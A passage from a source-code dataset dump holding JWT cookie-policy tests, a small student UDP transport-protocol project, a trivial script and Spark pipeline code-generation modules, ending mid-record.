"repo_name": "tripsolutions/pyramid_jwt",
"src_encoding": "UTF-8",
"text": "import uuid\n\nimport pytest\n\nfrom pyramid.interfaces import IAuthenticationPolicy\nfrom webob import Request\nfrom zope.interface.verify import verifyObject\n\nfrom pyramid_jwt.policy import JWTCookieAuthenticationPolicy\n\n\[email protected](scope=\"module\")\ndef principal():\n return str(uuid.uuid4())\n\n\ndef test_interface():\n verifyObject(IAuthenticationPolicy, JWTCookieAuthenticationPolicy(\"secret\"))\n\n\ndef test_cookie(principal):\n dummy_request = Request.blank(\"/\")\n policy = JWTCookieAuthenticationPolicy(\"secret\")\n token = policy.create_token(principal)\n cookie = policy.remember(dummy_request, token).pop()\n\n assert len(cookie) == 2\n\n header, cookie = cookie\n assert header == \"Set-Cookie\"\n assert len(cookie) > 0\n\n\ndef test_cookie_name(principal):\n dummy_request = Request.blank(\"/\")\n policy = JWTCookieAuthenticationPolicy(\"secret\", cookie_name=\"auth\")\n token = policy.create_token(principal)\n _, cookie = policy.remember(dummy_request, token).pop()\n\n name, value = cookie.split(\"=\", 1)\n assert name == \"auth\"\n\n\ndef test_secure_cookie():\n policy = JWTCookieAuthenticationPolicy(\"secret\", https_only=True)\n dummy_request = Request.blank(\"/\")\n token = policy.create_token(str(uuid.uuid4()))\n _, cookie = policy.remember(dummy_request, token).pop()\n\n assert \"; secure;\" in cookie\n assert \"; HttpOnly\" in cookie\n\n\ndef test_insecure_cookie(principal):\n dummy_request = Request.blank(\"/\")\n policy = JWTCookieAuthenticationPolicy(\"secret\", https_only=False)\n token = policy.create_token(principal)\n _, cookie = policy.remember(dummy_request, token).pop()\n\n assert \"; secure;\" not in cookie\n assert \"; HttpOnly\" in cookie\n\n\ndef test_cookie_decode(principal):\n dummy_request = Request.blank(\"/\")\n policy = JWTCookieAuthenticationPolicy(\"secret\", https_only=False)\n\n token = policy.create_token(principal)\n header, cookie = policy.remember(dummy_request, token).pop()\n name, value = cookie.split(\"=\", 1)\n\n value, _ = value.split(\";\", 1)\n dummy_request.cookies = {name: value}\n\n claims = policy.get_claims(dummy_request)\n assert claims[\"sub\"] == principal\n\n\ndef test_invalid_cookie_reissue(principal):\n dummy_request = Request.blank(\"/\")\n policy = JWTCookieAuthenticationPolicy(\"secret\", https_only=False, reissue_time=10)\n\n token = \"invalid value\"\n header, cookie = policy.remember(dummy_request, token).pop()\n name, value = cookie.split(\"=\", 1)\n\n value, _ = value.split(\";\", 1)\n dummy_request.cookies = {name: value}\n\n claims = policy.get_claims(dummy_request)\n assert not claims\n\n\ndef test_cookie_max_age(principal):\n dummy_request = Request.blank(\"/\")\n policy = JWTCookieAuthenticationPolicy(\"secret\", cookie_name=\"auth\", expiration=100)\n _, cookie = policy.remember(dummy_request, principal).pop()\n _, value = cookie.split(\"=\", 1)\n\n _, meta = value.split(\";\", 1)\n assert \"Max-Age=100\" in meta\n assert \"expires\" in meta\n\n\[email protected]_time\ndef test_expired_token(principal, freezer):\n dummy_request = Request.blank(\"/\")\n policy = JWTCookieAuthenticationPolicy(\"secret\", cookie_name=\"auth\", expiration=1)\n token = policy.create_token(principal)\n _, cookie = policy.remember(dummy_request, token).pop()\n name, value = cookie.split(\"=\", 1)\n\n freezer.tick(delta=2)\n\n value, _ = value.split(\";\", 1)\n dummy_request.cookies = {name: value}\n claims = policy.get_claims(dummy_request)\n\n assert claims == {}\n"
}
] | 1 |
katiemartins/smart_and_health_buildings
|
https://github.com/katiemartins/smart_and_health_buildings
|
0efa2a04bc9c9a3c8d5beda173c7d9bb68be9735
|
229beb305dc2d009bc5a16733eda8ab41f02165e
|
b0b453967c64f00591de1115bcf2af4814cf078e
|
refs/heads/main
| 2023-08-14T12:42:52.144688 | 2021-09-16T14:34:14 | 2021-09-16T14:34:14 | 406,953,615 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5652173757553101,
"alphanum_fraction": 0.5652173757553101,
"avg_line_length": 8.199999809265137,
"blob_id": "46feab5cc647b39dd7ed4200605d3aa11958d4e4",
"content_id": "127c137bd5e5466980aae744c78445022961d267",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 46,
"license_type": "no_license",
"max_line_length": 17,
"num_lines": 5,
"path": "/README.md",
"repo_name": "katiemartins/smart_and_health_buildings",
"src_encoding": "UTF-8",
"text": "### Katie Martins\n\n- Count\n- Paper\n- \"Regular\" Human\n"
},
{
"alpha_fraction": 0.5095541477203369,
"alphanum_fraction": 0.5286624431610107,
"avg_line_length": 17.875,
"blob_id": "1ec46f1a07966fa66850be55521992aa4f300f8b",
"content_id": "43315fefe9002921cadc465817927f1ba132181a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 157,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 8,
"path": "/good_bye.py",
"repo_name": "katiemartins/smart_and_health_buildings",
"src_encoding": "UTF-8",
"text": "import random\r\n\r\ndef main():\r\n for i in range (random.randint(1, 25)):\r\n print(\"good bye cruel world \\n\")\r\n\r\nif __name__ == \"__main__\":\r\n main()"
}
] | 2 |
khanquer/CS352ProjectPart2
|
https://github.com/khanquer/CS352ProjectPart2
|
e1232ce6f2c6121dd5bc7fb0bcf41b1c3aff2504
|
0079f37c37bac3a82fe94c4401e84b05c56370e3
|
6fbc095c2d6297d9bca24a765b03849ade677433
|
refs/heads/master
| 2020-09-29T11:25:39.428183 | 2019-12-11T04:16:14 | 2019-12-11T04:16:14 | 227,029,420 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5471698045730591,
"alphanum_fraction": 0.5641509294509888,
"avg_line_length": 24.238094329833984,
"blob_id": "ad8ec5e64031150bea69b73a979d62a9f2ee48df",
"content_id": "915c20b5368f117eebf4c33ec61dbf4e57f01430",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 530,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 21,
"path": "/util.py",
"repo_name": "khanquer/CS352ProjectPart2",
"src_encoding": "UTF-8",
"text": "class dbuffer:\n def __init__(self):\n self.MAXSIZE = 2620000\n self.buff = bytes()\n self.len = 0\n self.isFull = False\n self.initialized = False\n \n def initialize(self):\n self.initialized = True\n\n def addStuff(self, stuff, length):\n self.buff = self.buff + stuff\n self.len = self.len + length\n return\n\n def remStuff(self,nbytes):\n return self.buff[0:nbytes]\n\n def __str__(self):\n return 'PRINT FROM THE dbuffer CLASS : ' + str(self.buff)\n"
},
{
"alpha_fraction": 0.528799295425415,
"alphanum_fraction": 0.54402095079422,
"avg_line_length": 31.847999572753906,
"blob_id": "b775959a7f7277f706e3bd07299d1b5978cd15d3",
"content_id": "1debbbc57d9ebfd97cccbddb4400075adaea5505",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16424,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 500,
"path": "/sock352.py",
"repo_name": "khanquer/CS352ProjectPart2",
"src_encoding": "UTF-8",
"text": "import binascii\nimport socket as syssock\nimport struct\nimport sys, os\n\nimport random\nimport threading\nimport time\n\nfrom util import dbuffer\n\n# these functions are global to the class and\n# define the UDP ports all messages are sent\n# and received from\n\nmainSock = (0, 0)\nportTx = 0\nportRx = 0\ncAddress = None\n\n\nfileLen = -1\nmaxBytes = 32000\nmaxSend = 0\ngstartI = 0\ngseqNo = 0x00\n\ndone = False\nstartChanged = False\n\ntimeoutDuration = 0.2\n\nflag = 0x00\nheaderLen = 0x17\nfirstseqNo = 0x00\nfinalseqNo = 0x00\n\nseqNo = 0x00\nackNo = 0x00\n\npayloadLen = 0x00\n\nshowPrint = True\ndropPackets = False\n\nbfile = bytes()\nalldata = bytes()\n\nbytesreceived = 0\nrecBytes = 0\n\nflagsDict = {0x01:'SYN', 0x02:'FIN', 0x03:'DATA', 0x04:'ACK',\\\n 0x08:'SOCK352_RESET', 0xA0:'SOCK352_HAS_OPT'}\n\n\n\ndef init(UDPportTx,UDPportRx): # initialize your UDP socket here \n print(UDPportTx)\n print(UDPportRx)\n global mainSock, portTx, portRx\n\n portTx = int(UDPportTx)\n portRx = int(UDPportRx)\n \n cAddress = portRx\n\n mainSock = syssock.socket(syssock.AF_INET, syssock.SOCK_DGRAM)\n mainSock.bind(('',portTx))\n print(type(mainSock))\n pass\n \nclass socket:\n def __init__(self): # fill in your code here\n print('Initializing')\n if (showPrint == False):\n self.disablePrint()\n else:\n self.enablePrint()\n self.t2 = threading.Thread(target = self.recvThread,args = ())\n\n self.buff = dbuffer()\n \n return\n def bind(self,address):\n print('Binding')\n #print(address)\n return \n\n #Connect implements the client end of the three-way handshake\n #First sends a Syn pack to server\n #Receives a Syn ack pack from server\n #Then sends Ack packet to server\n #This informs the socket what ACK to expect from the server by setting local Ack and Seq No\n \n def connect(self,address): # fill in your code here \n global mainSock, cAddress\n global flag, headerLen, seqNo, ackNo, payloadLen\n \n print('CLIENT SOCK INFO = {}'.format(mainSock.getsockname))\n \n seqNo = random.randint(1,1000)\n \n #aflag, seqNo, ackNo, payloadLen\n \n synpackheader = self.getPacketHeader(0x01,seqNo,0x00,0x00)\n print(synpackheader)\n mainSock.sendto(synpackheader,('',portRx))\n print('SENT SYNPACK TO SERVER ')\n rec = mainSock.recv(maxBytes)\n print('RECEIVED SYNACK PACK FROM SERVER ')\n [flags,headerLen,s,a,payloadLen] = self.openPacketHeader(rec)\n ackNo = s\n ackheader = self.getPacketHeader(0x04,0x00,s+1,0x00)\n mainSock.sendto(ackheader,('',portRx))\n print('SENT ACK PACK TO SERVER')\n print( ' CLIENT SEQNO = {} | ACKNO = {} '.format(seqNo,ackNo))\n \n return \n\n #does nothing for now\n def listen(self,backlog):\n return\n\n #Accept executes the server end's three way handshake\n # First receives the syn packet from client, checks the flag to be SYN, records the sequence number and sets the ack as this\n # Send the SYN ACK packet back using a random number for the Syn\n # Receive ACK packet from the client\n # Uses openPacketHeader and getPacketHeader to generate and parse packets \n def accept(self):\n \n global mainSock \n global flag,headerLen,seqNo,ackNo,payloadLen\n print('SERVER SOCK INFO = {}'.format(mainSock.getsockname()))\n \n print(flag,headerLen,seqNo,ackNo,payloadLen)\n \n while ((flag == 0x00) and (flagsDict.get(flag)!= 'SYN')):\n rec = mainSock.recv(maxBytes)\n [flag,headerLen,s,a,payload_len] = self.openPacketHeader(rec)\n print()\n \n print('RECEIVED SYN PACK FROM CLIENT ')\n \n seqNo = random.randint(1,1000)\n ackNo = s+1\n packet = self.getPacketHeader(0x01, seqNo, ackNo, payloadLen)\n \n mainSock.sendto(packet,('',portRx))\n print('SENT SYNPACK TO CLIENT ')\n \n rec = mainSock.recv(maxBytes)\n print('RECEIVED ACK FROM CLIENT ')\n \n print( ' SERVER SEQNO = {} | ACKNO = {} '.format(seqNo,ackNo))\n return(self,portRx)\n \n def close(self): # fill in your code here\n global headerLen\n print('CLOSE CALLED')\n pktReceived = False\n mainSock.settimeout(0.5)\n finpkt = self.getPacketHeader(0x02,seqNo+1,ackNo,0x00)\n \n while (not pktReceived):\n try:\n receivedpkt = mainSock.recv(headerLen)\n pktReceived = True\n except syssock.timeout:\n mainSock.sendto(finpkt,('',portRx))\n print('SENT A FIN PACKET')\n pktReceived = False\n print(receivedpkt)\n receivedOpen = self.openPacketHeader(receivedpkt)\n rflag = receivedOpen[0]\n seq = receivedOpen[1]\n #print(receivedOpen[0],receivedOpen[2])\n ackpkt = self.getPacketHeader(0x04,seqNo+1,seq+1,0x00)\n finpkt2 = self.getPacketHeader(0x02,seqNo+1,0,0x00)\n\n mainSock.settimeout(3)\n print(rflag)\n print(flagsDict.get(rflag))\n #if(flagsDict.get(rflag) == 'FIN'):#You are the fin receiver\n if(rflag != 4):\n print('I AM THE FIN RECEIVER\\n')\n mainSock.sendto(ackpkt,('',portRx))\n mainSock.sendto(finpkt2,('',portRx))\n mainSock.recv(headerLen)\n else: #FIN INITIATOR\n print('I AM THE FIN INITIATOR\\n')\n mainSock.recv(headerLen)\n mainSock.sendto(ackpkt,('',portRx))\n \n print('CONNECTION CLOSED USING DOUBLE HANDSHAKE')\n return \n\n '''\n send does a few things\n 1. send the file length to the server\n 2. sends the file contents to the server\n 3. starts threads 1 and 3\n * thread 1: controls the sending of the contents to the server\n * thread 3: controls reciving of acknowledgements from server\n '''\n\n def send(self,buffer):\n print('SEND EXECUTED \\n\\t SOCK INFO : {}'.format(mainSock.getsockname()))\n \n global fileLen, maxBytes, bfile, firstseqNo,finalseqNo, maxSend\n global flag, headerLen, seqNo, ackNo, payloadLen\n \n if(fileLen == -1):\n longPacker = struct.Struct(\"!L\")\n fileLen = longPacker.unpack(buffer)\n fileLen = fileLen[0]\n print(fileLen)\n mainSock.sendto(buffer,('',portRx))\n return\n \n maxSend = maxBytes - headerLen\n seqNo = seqNo + 1\n firstseqNo = seqNo\n finalseqNo = int(fileLen/maxSend)+firstseqNo\n if (fileLen%maxSend > 0):\n finalseqNo += 1\n print('firstseqNo = {} | finalseqNo = {}\\n'.format(firstseqNo,finalseqNo))\n bytessent = 0 \n print('BUFFER LEN = {}'.format(len(buffer)))\n bfile = buffer[0:len(buffer)]\n t1 = threading.Thread(target = self.sendThread)\n t3 = threading.Thread(target = self.recvAckThread)\n #t2 = threading.Thread(target = recvAckThread, args())\n \n \n print('THREAD 1 STARTED')\n t1.start()\n print('THREAD 3 STARTED')\n t3.start()\n t1.join()\n t3.join() \n \n self.enablePrint()\n return fileLen\n\n def recv(self,nbytes):\n print('RECV EXECUTED \\n\\t SOCK INFO : {}'.format(mainSock.getsockname()))\n global fileLen, maxBytes, recBytes\n global flag, headerLen, seqNo, ackNo, payloadLen\n \t\n if(fileLen == -1):\n fileLenPacked = mainSock.recv(10)\n longPacker = struct.Struct(\"!L\")\n fileLen = longPacker.unpack(fileLenPacked)\n print('FILE LENGTH = {}'.format(fileLen[0]))\n fileLen = fileLen[0]\n return fileLenPacked\n \t\n print('fileLen = {}'.format(fileLen))\n b = self.buff\n t2 = self.t2\n if (b.initialized == False):\n b.initialized = True\n t2.start()\n \n chunk = self.detractBuff(nbytes)\n \n recBytes = recBytes + nbytes\n \n \n if(recBytes >= fileLen):\n t2.join()\n \n print('recv called | nbytes = {} | chunk = {} \\n'.format(nbytes,chunk))\n \t\n return chunk\n \n def detractBuff(self,nbytes):\n print(self.buff)\n size = 0\n while (size == 0):\n size = self.buff.len\n continue\n \n stuff = self.buff.remStuff(nbytes)\n return stuff\n \n #SEND PACKETS\n #CLIENT THREAD 1\n def sendThread(self):\n print('SEND THREAD EXECUTED')\n \n #aflag, seqNo, ackNo, payloadLen\n global fileLen, maxBytes, bfile, done, gstartI, gseqN, startChanged,maxSend\n global flag, headerLen, seqNo, ackNo, payloadLen\n maxSend = maxBytes-headerLen\n payloadLen = maxSend\n bytessent = 0\n startI = 0\n endI = startI + payloadLen\n seqNo = seqNo + 1\n while(done == False):\n if (startI < fileLen):\n if (startChanged == True):\n startI = gstartI\n seqNo = gseqNo\n \n endI = startI + maxSend\n \n startChanged = False\n\n if (endI > fileLen):\n endI = fileLen\n \n payloadLen = endI - startI\n #else:\n # endI = startI + payloadLen\n \t \n b = bfile[startI:endI]\n \n head = self.getPacketHeader(0x03,seqNo,0x00,payloadLen)\n sendProb = random.randint(1,10)\n #mainSock.sendto(head+b,('',portRx))\n if(dropPackets == False):\n sendProb = 10\n\n if (sendProb > 3):\n mainSock.sendto(head+b,('',portRx))\n print('SENT THIS PACKET : ')\n else:\n print('DROPPED THIS PACKET : ')\n \n print('(seqNo = {} | ackNo = {}) \\n'.format(seqNo,0))\n #self.openPacketHeader(head)\n print('\\nINDICES | startI = {} | endI = {}\\n'.format(startI,endI))\n \n seqNo = seqNo + 1\n startI = startI + maxSend\n \n bytessent = bytessent + payloadLen\n # fill in your code here \n else:\n #time.sleep(.3)\n #print('\\n',startI,startChanged,gstartI)\n #startChanged, gstartI\n if(startChanged == True):\n #print('\\n',startI,startChanged,gstartI)\n startI = gstartI\n print('\\n',startI,startChanged,gstartI,gseqNo)\n return\n \n #LISTEN FOR ACKS FROM SERVER AND \n #CLIENT THREAD 2\n #THREAD 3\n def recvAckThread(self):\n global seqNo, firstseqNo, finalseqNo, timeoutDuration, done # gstartI\n global startChanged, gstartI, gseqNo\n currentackNo = firstseqNo\n startTime = 0\n endTime = 0\n startTime = time.clock()\n mainSock.settimeout(.001)\n hplusb = bytes()\n timeout = False\n \n headerLen = 0\n while(not done):\n print('\\trecvacklistening')\n \n try:\n hplusb = mainSock.recv(maxBytes)\n timeout = False\n except syssock.timeout:\n print('\\tSOCKET TIMEOUT BUT CONTINUE')\n timeout = True\n \n if (timeout == False):\n (head,data) = self.stripPacket(hplusb)\n print('\\n\\tPACKET ACK THAT WAS RECEIVED')\n [flags,headerLen,recseqNo,recackNo,payload_len] = self.openPacketHeader(head)\n print('\\t (recackNo = {} | currackNo = {}) \\n'.format(recackNo,currentackNo))\n if (recackNo > currentackNo):\n startTime = time.clock()\n currentackNo = recackNo\n \n endTime = time.clock()\n \n print('\\tstartTime = {} | endTime = {}'.format(startTime,endTime))\n dt = endTime - startTime\n print('\\tdt = {}'.format(dt))\n if (dt > timeoutDuration): #NEED TO TIME OUT AND RESET SENDER\n print('\\tTIME OUT SEND THE PACKET')\n \n gstartI = (currentackNo - firstseqNo)*(maxBytes-headerLen)\n \n startChanged = True\n gseqNo = currentackNo\n print('\\t firstseqNo = {} | seqNo = {} | gstartI = {} | startChanged = {}'.format(firstseqNo,seqNo,gstartI,startChanged))\n \n numpackets = (currentackNo - firstseqNo)\n print('\\t NUMBER OF PACKETS SENT (#ACK RECEIVED) = {}'.format(numpackets))\n maxSend = maxBytes-headerLen \n print('\\t\\t {}'.format(numpackets*maxSend))\n if (currentackNo >= finalseqNo):\n done = True\n print(finalseqNo)\n pass\n \n #LISTEN FOR SEQ AND SEND BACK ACK \n #SERVER THREAD 1\n #THEAD 2\n def recvThread(self):\n global fileLen, maxBytes, bytesreceived, done, alldata\n global flag, headerLen, seqNo, ackNo, payloadLen\n \n #alldata = bytes()\n bytesreceived = 0\n \t \n while (not done):\n print('LISTENING TO INPUTS | bytesreceived = {} | fileLen = {}'.format(bytesreceived,fileLen))\n \n hplusb = mainSock.recv(maxBytes)\n (head,data) = self.stripPacket(hplusb)\n print('\\nPACKET THAT WAS RECEIVED')\n [flags,headerLen,recseqNo,recackNo,payload_len] = self.openPacketHeader(head)\n \n if (recseqNo != ackNo): # WRONG PACKET RECEIVED (packet loss)\n head = self.getPacketHeader(0x04,0x00,ackNo,payloadLen)\n mainSock.sendto(head,('',portRx))\n print('SENT THIS ACK : seqNo = {} | ackNo = {} \\n'.format(0,ackNo))\n \n else:\n print(' RECEIVED CORRECT PACKET')\n ackNo = ackNo + 1\n head = self.getPacketHeader(0x04,0x00,ackNo,payloadLen)\n mainSock.sendto(head,('',portRx))\n print('SENT THIS ACK : seqNo = {} | ackNo = {} \\n '.format(0,ackNo))\n bytesreceived += payload_len\n alldata = alldata + data\n # CHECK IF BUFFER IS FULL BEFORE FILLING \n b = self.buff\n b.addStuff(data,payload_len)\n print(' BYTES RECEIVED = {} '.format(bytesreceived))\n \n if (bytesreceived >= fileLen):\n done = True\n pass\n \n \t\n #aflag, seqNo, ackNo, payloadLen\n def getPacketHeader(self, aflag, seqNo, ackNo, payloadLen):\n \n flags = aflag\n #headerLen= 0x17\n sequence_no = seqNo\n ack_no = ackNo\n payload_len = payloadLen\n \n version = 0x01\n opt_ptr = 0x00\n protocol = 0x00\n checksum = 0x00\n source_port = 0x00\n dest_port = 0x00\n window = 0x00\n \n headerLen = struct.calcsize('!BHQQLBBBHLLL')\n head = struct.pack('!BHQQLBBBHLLL',flags,headerLen,seqNo,ackNo,payloadLen, version,opt_ptr,protocol, checksum,source_port,dest_port,window)\n \n return head\n \n def openPacketHeader(self, packet):\n l = struct.unpack('!BHQQLBBBHLLL',packet)\n [flags,headerLen,seqNo,ackNo,payload_len,version,opt_ptr,protocol,checksum,source_port,dest_port,window] = l\n sl = l[0:5]\n #print(l)\n return sl\n \n '''\n def openPacketHeader2(self, packet):\n l = struct.unpack('!BQBB',packet)\n #0x02,seqNo+1,0x00,0x00\n [flags,seqNo,opt_ptr,protocol] = l\n return [flags, seqNo]\n '''\n def stripPacket(self, b):\n \n global headerLen\n d = headerLen\n head = b[0:d]\n data = b[d:]\n headopen = self.openPacketHeader(head)\n #print(' HEAD = {}'.format(headopen))\n #print(' DATA = {}'.format(data))\n return((head,data))\n\n def enablePrint(self):\n sys.stdout = sys.__stdout__\n\n def disablePrint(self):\n sys.stdout = open(os.devnull,'w')\n"
}
] | 2 |
temizkanekin/arakat
|
https://github.com/temizkanekin/arakat
|
cef9fdc8cd7a16df1d77694355db5fc97886fa45
|
0087fc4a010dbc4bcb825626cdb350482ef83664
|
b93a31346ae8cabf52c9216579b5614500eb87c3
|
refs/heads/master
| 2020-03-28T12:01:04.636200 | 2019-01-17T10:54:35 | 2019-01-17T10:54:35 | 148,264,212 | 0 | 0 |
Apache-2.0
| 2018-09-11T05:18:08 | 2018-09-07T13:38:57 | 2018-09-07T13:41:38 | null |
[
{
"alpha_fraction": 0.5732966065406799,
"alphanum_fraction": 0.5739848613739014,
"avg_line_length": 40.5428581237793,
"blob_id": "a1fd26321d4c5a7628285ab2a3fbf7fca2ba747a",
"content_id": "d291360cacd2aa0717dbcc2cd119eb7b09e7b990",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1453,
"license_type": "permissive",
"max_line_length": 233,
"num_lines": 35,
"path": "/arakat-backend/utils/CodeGenerationUtils.py",
"repo_name": "temizkanekin/arakat",
"src_encoding": "UTF-8",
"text": "import os\n\ndef arrange_parameter_value(parameter_value):\n # For now, we will not allow dict and set; but handle them in case...\n if(isinstance(parameter_value, str)):\n value=__add_quotes_around_val(parameter_value)\n elif(isinstance(parameter_value, list)):\n value=[\"[\"]\n for val in parameter_value:\n value.extend([arrange_parameter_value(val), \", \"])\n value.pop()\n value.append(\"]\")\n value=''.join(value)\n else:\n value=str(parameter_value)\n\n return value\n\ndef __add_quotes_around_val(val):\n return '\"'+str(val)+'\"'\n\ndef arrange_schema(schema_info):\n # schema_info: [{\"column_name\":\"name\", \"data_type\": \"StringType\", \"is_nullable\": True}, {\"column_name\":\"name\", \"data_type\": \"ArrayType\", \"is_nullable\": True, \"array_extra\":{\"data_type\": \"IntegerType\", \"is_nullable\": False}}, ...]\n code=[\"StructType([\"]\n for elem in schema_info:\n if(elem[\"data_type\"] == \"ArrayType\"):\n code.extend(['StructField(\"'+ elem[\"column_name\"] +'\", ArrayType(' + elem[\"array_extra\"][\"data_type\"] +'(), ' + str(elem[\"array_extra\"][\"is_nullable\"]) + '), ' + str(elem[\"is_nullable\"]) + \")\", \", \"])\n else:\n code.extend(['StructField(\"' + elem[\"column_name\"] +'\", ' + elem[\"data_type\"] + '(), ' + str(elem[\"is_nullable\"]) + \")\", \", \"])\n\n # Might be an unnecessary check\n if (len(schema_info) > 0):\n code.pop()\n code.append(\"])\")\n return code"
},
{
"alpha_fraction": 0.6367663145065308,
"alphanum_fraction": 0.644518256187439,
"avg_line_length": 38.30434799194336,
"blob_id": "c8d6f38664a8c988b40fdcbb1f15033f6102cead",
"content_id": "f756a3304cf1aef9a5d6ae57bf8a72af95f002b6",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 903,
"license_type": "permissive",
"max_line_length": 220,
"num_lines": 23,
"path": "/arakat-backend/pipeline_generator/family_base/BatchWriteToFile.py",
"repo_name": "temizkanekin/arakat",
"src_encoding": "UTF-8",
"text": "from domain.ErrorTypes import ErrorTypes\nfrom validity import IncomingEdgeValidityChecker\nfrom utils import CodeGenerationUtils\n\nimport os\n\ndef generate_code(args):\n node = args[\"node\"]\n requireds_info = args[\"requireds_info\"]\n edges = args[\"edges\"]\n\n checklist={\"df_count\": {1}, \"model_count\": {0}}\n error, extra=IncomingEdgeValidityChecker.check_validity(node[\"id\"], requireds_info, edges, checklist)\n code=[]\n if(error == ErrorTypes.NO_ERROR):\n if (bool(extra[\"dfs\"])):\n df_name = \"df_\" + extra[\"dfs\"][0]\n else:\n df_name = \"df_\" + extra[\"portions\"][0][0] + \"[\" + str(extra[\"portions\"][0][1]) + \"]\"\n\n code.extend([df_name + \".write.save(\" + CodeGenerationUtils.arrange_parameter_value(node[\"parameters\"][\"file_path\"]) +\", format=\"+ CodeGenerationUtils.arrange_parameter_value(node[\"file_type\"]) +\")\", os.linesep])\n\n return code, error"
},
{
"alpha_fraction": 0.59543377161026,
"alphanum_fraction": 0.59543377161026,
"avg_line_length": 36.7931022644043,
"blob_id": "eeacba25dc876c9ff4d82d496de6b41cf20c94ae",
"content_id": "77977153d29626ade31c6cf64f28f63b1b27c6e9",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1095,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 29,
"path": "/arakat-backend/validity/IncomingEdgeValidityChecker.py",
"repo_name": "temizkanekin/arakat",
"src_encoding": "UTF-8",
"text": "from domain.ErrorTypes import ErrorTypes\n\ndef check_validity(node_id, requireds_info, edges, checklist):\n # Assuming that there is no order among incoming edges.\n # In such a case, keep extra info in edges.\n\n error=ErrorTypes.NO_ERROR\n extra={\"models\":[], \"dfs\":[], \"portions\":[]}\n\n if(node_id in requireds_info):\n for req in requireds_info[node_id]:\n edge = edges[req + \"-\" + node_id]\n if(edge[\"type\"]==\"dataframe\"):\n extra[\"dfs\"].append(req)\n elif(edge[\"type\"]==\"portion\"):\n extra[\"portions\"].append([req, edge[\"portion_id\"]])\n elif(edge[\"type\"]==\"model\"):\n extra[\"models\"].append(req)\n else:\n error=ErrorTypes.UNDEFINED_EDGE_ERROR\n\n df_count=len(extra[\"dfs\"]) + len(extra[\"portions\"])\n if(df_count not in checklist[\"df_count\"]):\n error = ErrorTypes.INCOMING_DATAFRAME_COUNT_NOT_MATCH_ERROR\n\n if(len(extra[\"models\"]) not in checklist[\"model_count\"]):\n error = ErrorTypes.INCOMING_MODEL_COUNT_NOT_MATCH_ERROR\n\n return error, extra"
},
{
"alpha_fraction": 0.6572989821434021,
"alphanum_fraction": 0.6619828343391418,
"avg_line_length": 35.628570556640625,
"blob_id": "408c03b2431a81a41c77cc9c1e8da74d23ef8121",
"content_id": "8107ce419d0b62926abf632a81d87924eb2ab8f4",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1281,
"license_type": "permissive",
"max_line_length": 188,
"num_lines": 35,
"path": "/arakat-backend/pipeline_generator/family_base/Join.py",
"repo_name": "temizkanekin/arakat",
"src_encoding": "UTF-8",
"text": "from domain.ErrorTypes import ErrorTypes\nfrom utils import CodeGenerationUtils\nfrom validity import IncomingEdgeValidityChecker\n\nimport os\n\n# Add other join options as well\n# Allow user to specify which dataframe is on left or right\n# How about join cascades\n# Add necessary checks for stream-stream, stream-batch joins...\ndef generate_code(args):\n node = args[\"node\"]\n requireds_info = args[\"requireds_info\"]\n edges = args[\"edges\"]\n\n checklist={\"df_count\": {2}, \"model_count\": {0}}\n error, extra=IncomingEdgeValidityChecker.check_validity(node[\"id\"], requireds_info, edges, checklist)\n code=[]\n if(error == ErrorTypes.NO_ERROR):\n df_names=__get_dfs_to_join(extra)\n code.extend([\"df_\"+node[\"id\"] + \"=\"+df_names[0] + \".join(\" + df_names[1] + \", \" + CodeGenerationUtils.arrange_parameter_value(node[\"parameters\"][\"join_column\"]) + \")\", os.linesep])\n\n return code, error\n\ndef __get_dfs_to_join(extra):\n # In the future, this should handle, left-right dfs and cascades...\n # Also, for stream-static joins, stream df must be on left.\n df_names=[]\n for elem in extra[\"dfs\"]:\n df_names.append(\"df_\" + elem)\n\n for elem in extra[\"portions\"]:\n df_names.append(\"df_\" + elem[0] + \"[\" + str(elem[1]) + \"]\")\n\n return df_names"
},
{
"alpha_fraction": 0.5970149040222168,
"alphanum_fraction": 0.6567164063453674,
"avg_line_length": 20.363636016845703,
"blob_id": "1dae5c446f9a851245a6c47ab164bbb1b6caf02c",
"content_id": "451221aeeb12480b8bde929a99127be8638b6bd4",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 469,
"license_type": "permissive",
"max_line_length": 28,
"num_lines": 22,
"path": "/arakat-backend/domain/NodeFamilyTypes.py",
"repo_name": "temizkanekin/arakat",
"src_encoding": "UTF-8",
"text": "from enum import Enum\n\nclass NodeFamilyTypes(Enum):\n BatchReadFromFile = 0\n BatchReadFromKafka = 1\n BatchWriteToFile = 2\n BatchWriteToKafka = 3\n CrossValidator = 4\n DDFO = 5\n Estimator = 6\n Evaluator = 7\n Join = 8\n ModelApply = 9\n ModelLoad = 10\n ModelSave = 11\n Pipeline = 12\n RandomSplit = 13\n StreamReadFromFile = 14\n StreamReadFromKafka = 15\n StreamWriteToFile = 16\n StreamWriteToKafka = 17\n Transformer = 18"
},
{
"alpha_fraction": 0.6279069781303406,
"alphanum_fraction": 0.6319767236709595,
"avg_line_length": 48.17142868041992,
"blob_id": "8033f2333f7d96b944cbbfc3e3177e4f23f33498",
"content_id": "e12452b2529ca17c59691e74b62fb9af6651c7df",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1720,
"license_type": "permissive",
"max_line_length": 213,
"num_lines": 35,
"path": "/arakat-backend/pipeline_generator/family_base/StreamWriteToKafka.py",
"repo_name": "temizkanekin/arakat",
